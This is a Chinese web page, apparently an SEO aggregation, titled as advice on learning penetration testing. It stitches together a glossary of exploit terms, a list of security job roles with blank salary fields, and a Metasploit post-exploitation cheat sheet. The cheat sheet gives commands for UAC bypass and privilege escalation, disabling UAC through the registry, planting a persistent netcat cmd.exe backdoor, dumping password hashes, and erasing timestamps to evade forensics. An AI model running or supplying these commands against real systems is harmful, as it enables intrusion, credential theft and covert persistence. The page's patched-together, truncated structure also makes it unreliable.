渗透测试学什么系统好
【温馨提示】本文共有3385个字,预计阅读完需要9分钟,请仔细阅读哦!
NISP中渗透测试小白需要记录的专业术语,下面一起来看看本站小编网安世纪小刘给大家精心整理的答案,希望对您有帮助 在学习渗透测试的过程中,我们常会遇到或挺好一些专用的词语,今天给大家简单的总结一下,方便以后在工作领域能够更好的运用 一、POC、EXP、Payload与Shellcode常用的词语都代表了什么 POC:全名'ProofofConcept',汉语'概念验证',常指一段系统漏洞证明的编码。 EXP:全名'Exploit',汉语'利用',指运用安全漏洞开展攻击姿势。 Payload:汉语'有效载荷',指取得成功exploit以后,真正在总体目标系统软件实施的编码或命令。 Shellcode:简单翻译'shell编码',是Payload的一种,因其创建正方向/反方向shell而出名。 二、需要注意点在哪里 POC就是用来证实系统漏洞存有的,EXP就是用来运用系统漏洞的,二者一般并不是一类,换句话说,PoC一般是无害,Exp一般是有影响的,拥有POC,才会EXP。 Payload有许多种,它能是Shellcode,可以直接是一段DOS命令。同一个Payload可用作好几个系统漏洞,但每个系统漏洞都有它自已的EXP,换句话说不会有通用EXP。 Shellcode也有很多种,包含正面的,反方向的,乃至meterpreter。 Shellcode与Shellshcok不是一个,Shellshock专指14年找到的Shellshock系统漏洞。 三、Payload模块 在MetasploitFramework6大控制模块中有一个Payload控制模块,在这个控制模块底下Single、Stager、Stages这三种类型,Single是一个all-in-one的Payload,不依附别的文件,而且它的容积会非常大,Stager主要运用于当总体目标计算机的内存比较有限时,可以直接传送一个比较小的Stager用以建立连接,Stages指运用Stager创建连接免费下载后续Payload。Stager和Stages都是有多种类型,适用不一样情景。 以上内容全部都是在网安伴资讯了解道的,关注NISP管理中心,有更多精彩内容同步,与智者携手一起,向未来启新程。 前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,信息安全位列第一。 对于网络安全的发展与就业前景,知了姐说过很多,作为当下应届生收入较高的专业之一,网络安全同样也在转行领域占据热门位置,主要具备以下几点转行优势: ①行业人才缺口大,至2027年我国网安人才缺口将达327万 ②知识体系友好,计算机及英语水平相对薄弱的同学也可学习上手 ③入行门槛低,大专学历即可学习就业 ④薪资起点高 ⑤就业选择范围广,一个专业包含十余种岗位 岗位丰富,选择空间大,决定职业发展的高度,这也是网络安全备受青睐的原因之一,本期,我们就来盘一盘网络安全专业都有哪些重点就业岗位吧,要找工作的同学记得收藏呀~ 网络安全岗位知多少? 岗位一:渗透测试 岗位释义:模拟黑客攻击,利用黑客技术,挖掘漏洞,提出修复建议。有些大厂,例如奇安信,甚至会将渗透岗位分为红蓝两方,对候选人的技术要求比较高,大部分刚入行的新人,也将渗透岗位作为后期的发展目标。 岗位职责: ①负责对客户网络、系统、应用进行渗透测试、安全评估和安全加固 ②在出现网络攻击或安全事件时,提供应急响应服务,帮助用户恢复系统及调查取证 ③针对客户网络架构,建议合理的网络安全解决方案 工作难度:5颗星 薪资现状:渗透测试学什么系统好1
渗透测试学什么系统好2
岗位二:安全运维
岗位释义:维护网络系统的正常、安全运行,如果受到黑客攻击,则需要进行应急响应和入侵排查安全加固。很多刚毕业入行的新人,基本都从运维做起。
工作难度:3颗星
岗位职责:
①日常终端维护,操作系统安装加固
②完成网络安全设备故障排查、处置
③完成相关管理制度文档的编写和提交
薪资现状:
岗位三:安全运营
岗位释义:在运维的基础上,高效可持续地不断提升企业的安全防御能力的岗位。
岗位职责:
①负责监控、扫描等各类安全策略的制定和优化
②负责信息安全事件的应急响应
③参与网络安全评估工作、安全加固工作和监控等等
工作难度:3颗星
薪资现状:
岗位四:安全开发
岗位释义:顾名思义,对安全产品及平台、策略等进行开发工作。
岗位职责:
①负责网络安全产品的系统技术设计、代码开发与实现、单元测试、静态检查、本地构建等工作;
②参与公司其他产品的系统技术设计以及研发工作。
工作难度:5颗星
薪资现状:
岗位五:等保测评
岗位释义:等保测评也叫等级保护测评,主要负责开展信息安全等级保护测评、信息安全风险评估、应急响应、信息安全咨询等工作 。
岗位职责:
①网络安全等级保护测评项目实施;
②web渗透测试、操作系统安全加固等安全项目实施配合
工作难度:3颗星
薪资现状:
岗位六:安全研究
岗位释义:网络安全领域的研究人才。
岗位职责:
①跟踪和分析国内外安全事件、发展趋势和解决方案
②承担或参与创新型课题研究
③参与项目方案设计,组织推动项目落实,完成研究内容
④负责网络安全关键技术攻关和安全工具研发
工作难度:5颗星
薪资现状:
岗位七:网络工程师
岗位释义:主要负责对网络障碍的分析,及时处理和解决网络中出现的问题。
岗位职责:
①负责机房线路的布置和协议的规范工作
②利用网络测试分析仪,定期对现有的网络进行优化工作
工作难度:3颗星
薪资现状:
岗位八:安全管理工程师
岗位释义:负责信息安全相关流程、规范、标准的制定和评审,负责公司整体安全体系建设。
工作难度:4颗星
岗位九:售前工程师
岗位释义:负责网络安全售前产品交流,产品演示、技术讲解等工作
岗位职责:
①调研用户现状和安全需求,设计并编写售前技术方案
②编写招标文件,协助完成项目投标工作
③编制完善公司安全产品售前文档
⑤跟踪网络安全领域政策、标准、技术
工作难度:4颗星
薪酬现状:
岗位十:售后工程师
岗位释义:了解客户需求并协同相关部门进行产品实施部署,以及后期的需求跟踪及故障排除等工作
岗位职责:
①参与公司软件代码分析产品的安装部署、需求跟踪、效果反馈和总结
②定期拜访或回访现有用户,并根据客户需求结合公司产品新特性进行用户使用改善
③了解客户需求并协同相关部门进行产品实施部署,产品培训,故障排除,技术分析并提出解决方案或改进意见
工作难度:4颗星
薪酬现状:
写在最后
网络安全正处于高速发展阶段,不同的企业对于岗位的划分各有不同,但主要分为安全规划与设计、安全建设与实施、安全运行与维护、安全应急与防御、安全合规与管理等五大方向,因此对外开发的就业岗位多达十余种,本期知了姐仅针对重点岗位做盘点。
互联网时代的崛起,促使人工智能、物联网等产业不断发展,信息安全将是未来行业发展的重点议题,有转行想法的同学不要过多犹豫啦,抓住机会踩准风口,先人一步享受行业福利!
渗透测试学什么系统好3
- 已经获得目标系统控制权后扩大战果
- 提权
- 信息收集
- 渗透内网
- 永久后门
- 基于已有session扩大战果
获取system账号权限
load priv getsystem #一般情况下就权限拒绝,下面就要用UAC绕过了绕过UAC限制
use exploit/windows/local/ask set session set filename use exploit/windows/local/bypassuac use explot/windows/local/bypassuac_injuection set session set payload利用漏洞直接提权为system
use exploit/windows/local/ms13_053_schlamperei use exploit/windows/local/ms13_081_track_popup_menu use exploit/windows/local/ms13_097_ie_registry_symlink use exploit/windows/local/ppr_flatten_rec图形化payload
set payload windows/vncinject/reverse_tcp set viewonly no #可操作hashdump
Psexec模块之Pass
use exploit/windows/smb/psexec set smbpass hash需要提前关闭UAC
cmd.exe /k %windir%\Sysem32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWOED /d 1 /f- 关闭windows防火墙
- 关闭Windefend
- Bitlocker磁盘加密
- 关闭DEP
- 杀死防病毒软件
- 开启远程桌面服务
- 查看远程桌面
- Tokens
- 用户每次登录,账号绑定临时的Token
- 访问资源时提交Token进行身份验证,类似于WEB Cookie
- Delegate Token:交互登陆会话
- Impersonate Token:非交互登录会话
- Delegate Token账号注销后变为Impersonate Token,权限依然有效
- Incognito
- 独立功能的软件,被MSF集成在meterpreter中
- 无需密码破解或获取密码HASH,窃取Token将自己伪装成其他用户
- 尤其适用于域环境下提权、渗透多操作系统
- 运行以上命令需要getsystem
- 本地普通权限用户需先本地提权
- 注册表保存着windows几乎全部配置参数
- 如果修改不当,可直接造成系统崩溃
- 修改前完整备份注册表
- 某些注册表的修改是不可逆的
- 常见用法
- 修改、增加启动项
- 窃取存储于注册表中的机密信息
- 绕过文件型的病毒查杀
用注册表添加NC后门服务(meterpreter)
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传NC reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #新建主键 #建立子键,给予赋值 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' #查询是否成功 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc- 打开防火墙端口(meterpreter)
- 然后重启目标客户端
- 重启之后会自动运行nc
- 然后直接连接即可
抓包
load sniffer #导入抓包模块 sniffer_interfaces sniffer_start 2 sniffe_dump 2 1.cap / sniffer_dump 2 1.cap- 在内存中缓存区块循环存储抓包(50000包),不写硬盘
- 智能过滤meterpreter流量,传输全程使用SSL/TLS加密
解码
use auxiliary/sniffer/psnuffle set PCAPFILE 1.cap搜索文件
search -f *.ini search -d c:\\document\ and\ settings\\administrator\\desktop\\ -f *.docxJohn the Ripper破解弱口令
use post/windows/gather/hashdump #system权限的meterpreter run #结果保存在/tmp目录下- 文件系统访问会留下痕迹,电子取证重点关注
- 渗透测试和攻击者往往希望销毁文件系统访问痕迹
- 最好的避免被电子取证发现的方法:不要碰文件系统
- Meterpreter的先天优势所在(完全基于内存)
- MAC时间(Modified / Accessed / Changed)
MACE:MFT entry
- MFT:NTFS文件系统的主文件分配表 Master File Table
- 通常1024字节或2个硬盘扇区,其中存放多项entry信息
- 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
- 更多信息可研究,文件系统取证分析技术
Timestomp
timestomp -v 1.txt timestomp -f c:\\autoexec.bat 1.txt -b -r #擦除MACE时间信息,目前此参数功能失效 -m / -a / -c / -e / -z timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txtPivoting跳板 / 枢纽 /支点
- 利用已经控制的一台计算机作为入侵内网的跳板
- 在其他内网计算机看来访问全部来自于跳板机
自动路由 现实场景
- 利用win攻击内网机器(对比XP有无外网访问权限的情况)
- 扫描内网
Pivoting端口转发Portfwd
- 利用已经被控计算机,在kali与攻击目标之间实现端口转发
内容更新时间(UpDate): 2023年03月30日 星期四
版权保护: 【本文标题和链接】渗透测试学什么系统好 http://www.youmengdaxiazuofa.net/longxia8/97077.html
- 全部评论(0)